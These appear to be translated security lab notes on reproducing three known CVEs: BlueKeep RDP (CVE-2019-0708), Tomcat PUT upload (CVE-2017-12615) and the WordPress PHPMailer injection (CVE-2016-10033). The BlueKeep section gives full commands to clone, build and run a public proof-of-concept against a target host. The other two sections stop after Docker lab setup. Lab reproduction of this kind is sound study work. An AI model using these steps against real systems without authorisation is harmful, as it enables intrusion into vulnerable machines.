CVE-2019-0708

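Vulnerability verification

Reproduction environment:

Attacker machine: Kali Linux (Windows Subsystem for Linux)

Target host: Windows 7 SP1 64-bit

Environment preparation | PoC download/build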

sudo apt install dh-autoreconf
sudo apt install libssl-dev
sudo apt install libx11-dev
git clone https://github.com/zerosum0x0/CVE-2019-0708.git
cd CVE-2019-0708/rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773/
./bootstrap
./configure --disable-credssp --disable-smartcard
make
./rdesktop 192.168.1.7:3389

Tomcat Remote Code Execution Vulnerability (CVE-2017-12615)

0x00

As before, first set up the lab environment with Docker. The lab environment runs on Docker; Docker installation tutorial: https://blog.csdn.net/levones/article/details/80474994

Download the Docker image:

docker pull medicean/vulapps:t_tomcat_1

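WordPress <= 4.6 Command Execution Vulnerability (PHPMailer) (CVE-2016-10033) Lab

0x00

This vulnerability is exploited through HTTP header injection. Reference: http://www.freebuf.com/articles/web/164817.html

First, the source of the lab: http://vulapps.evalbug.com/w_wordpress_6/

The lab environment runs on Docker; Docker installation tutorial: https://blog.csdn.net/levones/article/details/80474994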
